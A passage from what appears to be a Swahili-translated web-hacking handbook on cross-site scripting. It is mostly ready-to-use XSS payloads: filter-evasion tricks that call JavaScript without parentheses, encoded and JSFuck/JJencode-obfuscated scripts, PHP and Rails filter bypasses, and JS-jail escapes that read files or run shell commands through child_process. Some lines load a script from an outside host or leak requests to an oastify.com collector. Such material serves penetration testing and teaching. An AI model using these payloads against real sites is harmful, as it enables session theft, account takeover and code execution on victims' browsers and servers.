<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>  <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
```
### Unicode Encode JS execution

### Ufanyaji wa JS wa Unicode wa Encode
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
### Mbinu za kukiuka orodha nyeusi ya JavaScript

**Maneno**
```javascript
"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
```
**Kutoroka Maalum**
```javascript
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
// Any other char escaped is just itself
```
**Badiliko la nafasi ndani ya msimbo wa JS**
```javascript
<TAB>
/**/
```
**Maoni ya JavaScript (kutoka** [**Mbinu za Maoni ya JavaScript**](./#javascript-comments) **udanganyifu)**
```javascript
//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
```
**Mstari mpya wa JavaScript (kutoka** [**Mstari mpya wa JavaScript**](./#javascript-new-lines) **udanganyifu)**
```javascript
//Javascript interpret as new line these chars:
String.fromCharCode(10); alert('//\nalert(1)') //0x0a
String.fromCharCode(13); alert('//\ralert(1)') //0x0d
String.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8
String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
```
**Nafasi za JavaScript**
```javascript
log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>
```
**Javascript ndani ya maoni**
```javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
```
**JavaScript bila mabano**
````javascript
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`

// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x```

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.



// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''


// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}


// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)

**Wito wa kazi ya kiholela (alert)**
````javascript
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
````
## **Mazingira ya DOM**

Kuna **msimbo wa JS** unaotumia **data isiyolindwa na mshambuliaji** kama vile `location.href`. Mshambuliaji, anaweza kutumia hii kutekeleza msimbo wa JS wa kupindukia.\
**Kutokana na upanuzi wa maelezo ya** [**mazingira ya DOM yalihama kwenye ukurasa huu**](dom-xss.md)**:**

{% content-ref url="dom-xss.md" %}
[dom-xss.md](dom-xss.md)
{% endcontent-ref %}

Huko utapata **maelezo ya kina kuhusu ni nini mazingira ya DOM, yanachochochewa, na jinsi ya kuyatumia**.\
Pia, usisahau kwamba **mwishoni mwa chapisho lililotajwa** unaweza kupata maelezo kuhusu [**mashambulizi ya DOM Clobbering**](dom-xss.md#dom-clobbering).

## Njia Nyingine za Kupita

### Unicode Iliyopangiliwa

Unaweza kuangalia ikiwa **thamani zilizorudishwa** zinapitia **upangilishaji wa unicode** kwenye seva (au upande wa mteja) na kutumia hii kukiuka ulinzi. [**Pata mfano hapa**](../unicode-injection/#xss-cross-site-scripting).

### Kupita Kizuizi cha PHP FILTER\_VALIDATE\_EMAIL
```javascript
"><svg/onload=confirm(1)>"@x.y
```
### Kupita kwa Ruby-On-Rails

Kutokana na **RoR utoaji wa wingi** alama za nukta zinaingizwa kwenye HTML na kisha kizuizi cha nukta kinapuuzwa na uga wa ziada (onfocus) unaweza kuongezwa ndani ya lebo.\
Fomu mfano ([kutoka ripoti hii](https://hackerone.com/reports/709336)), ikiwa unatuma mzigo:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
Mfano wa jozi "Key","Value" utarudishwa kama hivi:
```
{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
```
Kisha, sifa ya onfocus itaingizwa na XSS itatokea.

### Mchanganyiko Maalum
```markup
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
```
### XSS na uingizaji wa kichwa katika jibu la 302

Ikiwa utagundua kuwa unaweza **kuingiza vichwa katika jibu la Uelekezaji wa 302**, unaweza kujaribu **kuifanya kivinjari kutekeleza JavaScript ya kupindukia**. Hii sio **jambo rahisi** kwani vivinjari vya kisasa havitafsiri mwili wa jibu la HTTP ikiwa msimbo wa hali ya jibu la HTTP ni 302, kwa hivyo mzigo wa upelekaji wa tovuti wa msalaba ni bure.

Katika [**ripoti hii**](https://www.gremwell.com/firefox-xss-302) na [**hii nyingine**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi unavyoweza jaribu itifaki kadhaa ndani ya kichwa cha Mahali na uone ikiwa yoyote kati yao inaruhusu kivinjari kutathmini na kutekeleza mzigo wa XSS ndani ya mwili.\
Itifaki zilizojulikana hapo awali: `mailto://`, `//x:1/`, `ws://`, `wss://`, _kichwa cha Mahali kilicho wazi_, `resource://`.

### Barua, Nambari na Dots Pekee

Ikiwa unaweza kuonyesha **wito wa nyuma** ambao javascript ita**tekeleza** ukilazimishwa kwa wahusika hao tu. [**Soma sehemu hii ya chapisho hili**](./#javascript-function) ili ujue jinsi ya kutumia tabia hii.

### Aina za Yaliyomo Halali ya `<script>` kwa XSS

(Kutoka [**hapa**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Ikiwa unajaribu kupakia skripti na **aina ya yaliyomo** kama vile `application/octet-stream`, Chrome itatoa kosa lifuatalo:

> Imekataa kutekeleza skripti kutoka '[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') kwa sababu aina yake ya MIME ('application/octet-stream') haiwezi kutekelezwa, na uchunguzi wa aina ya MIME ulio kali umewezeshwa.

Aina pekee za **Yaliyomo** ambazo zitasaidia Chrome kutekeleza **skripti iliyopakiwa** ni zile ndani ya const **`kSupportedJavascriptTypes`** kutoka [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc)
```c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

```
### Aina za Script za XSS

(Kutoka [**hapa**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Kwa hivyo, aina zipi zinaweza kuashiriwa kwa kupakia script?
```html
<script type="???"></script>
```
Jibu ni:

* **moduli** (chaguo-msingi, hakuna kitu cha kufafanua)
* [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele ambacho unaweza kufunga kundi la data (HTML, CSS, JS...) pamoja katika faili ya **`.wbn`**.
```html
<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
```
* [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha muundo wa uingizaji
```html
<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment";
import { partition } from "lodash";
</script>
```
Hii tabia ilitumika katika [**makala hii**](https://github.com/zwade/yaca/tree/master/solution) kurekebisha maktaba kwa eval ili kuitumia kusababisha XSS.

* [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki kimsingi ni kutatua baadhi ya matatizo yanayosababishwa na upyaishaji wa awali. Inafanya kazi kama ifuatavyo:
```html
<script type="speculationrules">
{
"prerender": [
{"source": "list",
"urls": ["/page/2"],
"score": 0.5},
{"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1}
]
}
</script>
```
### Aina za Yaliyomo kwenye Wavuti kwa XSS

(Kutoka [**hapa**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Aina zifuatazo za yaliyomo zinaweza kutekeleza XSS kwenye vivinjari vyote:

* text/html
* application/xhtml+xml
* application/xml
* text/xml
* image/svg+xml
* text/plain (?? sio kwenye orodha lakini nadhani nimeiona katika CTF)
* application/rss+xml (lemaza)
* application/atom+xml (lemaza)

Katika vivinjari vingine **`Aina za Yaliyomo`** zingine zinaweza kutumika kutekeleza JS ya kupindukia, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)

### Aina ya Yaliyomo ya xml

Ikiwa ukurasa unarudisha aina ya yaliyomo ya text/xml, inawezekana kuonyesha nafasi ya majina na kutekeleza JS ya kupindukia:
```xml
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
```
### Mifano Ma Kipekee ya Badiliko

Wakati kitu kama **`"baadhi ya {{template}} data".replace("{{template}}", <user_input>)`** inapotumika. Mshambuliaji anaweza kutumia [**mbadala maalum wa herufi**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) kujaribu kukiuka baadhi ya ulinzi: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``

Kwa mfano katika [**hii andishi**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hii ilitumika kusafisha herufi ya JSON ndani ya script na kutekeleza nambari ya aina yoyote.

### Kuhifadhi Cache ya Chrome kwa XSS

{% content-ref url="chrome-cache-to-xss.md" %}
[chrome-cache-to-xss.md](chrome-cache-to-xss.md)
{% endcontent-ref %}

### Kutoroka Kutoka XS Jails

Ikiwa una seti ndogo tu ya herufi za kutumia, angalia suluhisho zingine halali kwa matatizo ya XSJail:
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
Ikiwa **kila kitu hakina ufafanuzi** kabla ya kutekeleza nambari isiyosadikika (kama ilivyo katika [**makala hii**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)), inawezekana kuzalisha vitu vya kutumika "kutoka hakuna" kwa kudhuru utekelezaji wa nambari isiyosadikika:

* Kutumia import()
```javascript
// although import "fs" doesn’t work, import('fs') does.
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
```
* Kupata `require` kwa njia isiyo ya moja kwa moja

[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) moduli zinawekwa ndani ya Node.js ndani ya kazi, kama hivi:
```javascript
(function (exports, require, module, __filename, __dirname) {
// our actual module code
});
```
Kwa hivyo, ikiwa kutoka kwa moduli hiyo tunaweza **kuita kazi nyingine**, ni rahisi kutumia `arguments.callee.caller.arguments[1]` kutoka kwa kazi hiyo ili kupata upatikanaji wa **`require`**:

{% code overflow="wrap" %}
```javascript
(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
```
{% endcode %}

Kwa njia kama ile ya mfano uliopita, ni **inawezekana kutumia wachambuzi wa makosa** kupata **mfuko** wa moduli na kupata kazi ya **`require`**:
```javascript
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()
```
### Obfuscation & Advanced Bypass

* **Obfuscations tofauti kwenye ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
* [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
* [http://www.jsfuck.com/](http://www.jsfuck.com)
* JSFuck ya kisasa zaidi: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
```javascript
//Katana
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
```

```javascript
//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
```

```javascript
//JSFuck
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
```

```javascript
//aaencode
